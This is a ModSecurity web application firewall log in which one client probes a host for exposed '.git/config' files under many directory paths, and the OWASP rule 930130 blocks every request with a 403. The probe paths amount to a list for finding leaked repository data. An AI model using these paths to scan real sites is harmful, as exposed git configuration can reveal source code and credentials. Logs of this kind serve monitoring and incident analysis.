[Fri May 24 12:48:29.356450 2024] [:error] [pid 3435645] [client 91.215.85.43:50340] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "ZlBwfZuF_OA4eW7yvNbAFQAAAAY"]
[Fri May 24 12:48:29.357926 2024] [:error] [pid 3439795] [client 91.215.85.43:50334] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "ZlBwfWxChojRwFblBeOgeAAAAAg"]
[Fri May 24 12:48:29.358378 2024] [:error] [pid 3439795] [client 91.215.85.43:50334] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "ZlBwfWxChojRwFblBeOgeAAAAAg"]
[Fri May 24 12:48:29.358799 2024] [:error] [pid 3439795] [client 91.215.85.43:50334] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "ZlBwfWxChojRwFblBeOgeAAAAAg"]
[Fri May 24 12:48:29.365706 2024] [:error] [pid 3435528] [client 91.215.85.43:50324] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v1/.git/config"] [unique_id "ZlBwfSKXiBXbyjJPtTG5cwAAAAA"]
[Fri May 24 12:48:29.366104 2024] [:error] [pid 3435528] [client 91.215.85.43:50324] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v1/.git/config"] [unique_id "ZlBwfSKXiBXbyjJPtTG5cwAAAAA"]
[Fri May 24 12:48:29.366413 2024] [:error] [pid 3435528] [client 91.215.85.43:50324] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v1/.git/config"] [unique_id "ZlBwfSKXiBXbyjJPtTG5cwAAAAA"]
[Fri May 24 12:48:29.445166 2024] [:error] [pid 3439796] [client 91.215.85.43:50348] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v1/.git/config"] [unique_id "ZlBwfSfcSRnYInexrFNgEAAAAAk"]
[Fri May 24 12:48:29.445853 2024] [:error] [pid 3439796] [client 91.215.85.43:50348] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v1/.git/config"] [unique_id "ZlBwfSfcSRnYInexrFNgEAAAAAk"]
[Fri May 24 12:48:29.446302 2024] [:error] [pid 3439796] [client 91.215.85.43:50348] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v1/.git/config"] [unique_id "ZlBwfSfcSRnYInexrFNgEAAAAAk"]
[Fri May 24 12:48:30.041809 2024] [:error] [pid 3439794] [client 91.215.85.43:44724] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v3/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaBAAAAAc"]
[Fri May 24 12:48:30.042178 2024] [:error] [pid 3435531] [client 91.215.85.43:44708] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /blog/wp-content/themes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQJwAAAAM"]
[Fri May 24 12:48:30.042275 2024] [:error] [pid 3439794] [client 91.215.85.43:44724] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v3/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaBAAAAAc"]
[Fri May 24 12:48:30.042598 2024] [:error] [pid 3439794] [client 91.215.85.43:44724] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v3/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaBAAAAAc"]
[Fri May 24 12:48:30.042795 2024] [:error] [pid 3435531] [client 91.215.85.43:44708] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQJwAAAAM"]
[Fri May 24 12:48:30.043197 2024] [:error] [pid 3435531] [client 91.215.85.43:44708] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/wp-content/themes/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQJwAAAAM"]
[Fri May 24 12:48:30.044362 2024] [:error] [pid 3435530] [client 91.215.85.43:44722] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /application/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVpAAAAAI"]
[Fri May 24 12:48:30.044693 2024] [:error] [pid 3435529] [client 91.215.85.43:44668] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v4/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v4/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMGQAAAAE"]
[Fri May 24 12:48:30.044811 2024] [:error] [pid 3435533] [client 91.215.85.43:44698] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /build/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/build/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWj_wAAAAU"]
[Fri May 24 12:48:30.045209 2024] [:error] [pid 3435529] [client 91.215.85.43:44668] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v4/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMGQAAAAE"]
[Fri May 24 12:48:30.045211 2024] [:error] [pid 3435533] [client 91.215.85.43:44698] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/build/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWj_wAAAAU"]
[Fri May 24 12:48:30.045525 2024] [:error] [pid 3435533] [client 91.215.85.43:44698] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/build/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWj_wAAAAU"]
[Fri May 24 12:48:30.045647 2024] [:error] [pid 3435529] [client 91.215.85.43:44668] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v4/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMGQAAAAE"]
[Fri May 24 12:48:30.046592 2024] [:error] [pid 3435532] [client 91.215.85.43:44740] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v4/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v4/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhbQAAAAQ"]
[Fri May 24 12:48:30.046968 2024] [:error] [pid 3435532] [client 91.215.85.43:44740] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v4/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhbQAAAAQ"]
[Fri May 24 12:48:30.047242 2024] [:error] [pid 3435532] [client 91.215.85.43:44740] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v4/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhbQAAAAQ"]
[Fri May 24 12:48:30.047555 2024] [:error] [pid 3435530] [client 91.215.85.43:44722] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVpAAAAAI"]
[Fri May 24 12:48:30.047821 2024] [:error] [pid 3435530] [client 91.215.85.43:44722] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVpAAAAAI"]
[Fri May 24 12:48:30.049727 2024] [:error] [pid 3435528] [client 91.215.85.43:44828] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZlBwfiKXiBXbyjJPtTG5dAAAAAA"]
[Fri May 24 12:48:30.049896 2024] [:error] [pid 3435528] [client 91.215.85.43:44828] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZlBwfiKXiBXbyjJPtTG5dAAAAAA"]
[Fri May 24 12:48:30.050022 2024] [:error] [pid 3435528] [client 91.215.85.43:44828] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZlBwfiKXiBXbyjJPtTG5dAAAAAA"]
[Fri May 24 12:48:30.050049 2024] [:error] [pid 3435645] [client 91.215.85.43:44778] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/themes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/themes/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAFgAAAAY"]
[Fri May 24 12:48:30.050260 2024] [:error] [pid 3435645] [client 91.215.85.43:44778] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/themes/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAFgAAAAY"]
[Fri May 24 12:48:30.050444 2024] [:error] [pid 3435645] [client 91.215.85.43:44778] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/themes/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAFgAAAAY"]
[Fri May 24 12:48:30.051146 2024] [:error] [pid 3439795] [client 91.215.85.43:44748] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /blog/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgeQAAAAg"]
[Fri May 24 12:48:30.051360 2024] [:error] [pid 3439795] [client 91.215.85.43:44748] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgeQAAAAg"]
[Fri May 24 12:48:30.051526 2024] [:error] [pid 3439796] [client 91.215.85.43:44844] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /git/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/git/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgEQAAAAk"]
[Fri May 24 12:48:30.051543 2024] [:error] [pid 3439795] [client 91.215.85.43:44748] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/blog/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgeQAAAAg"]
[Fri May 24 12:48:30.051683 2024] [:error] [pid 3439796] [client 91.215.85.43:44844] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/git/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgEQAAAAk"]
[Fri May 24 12:48:30.051817 2024] [:error] [pid 3439796] [client 91.215.85.43:44844] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/git/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgEQAAAAk"]
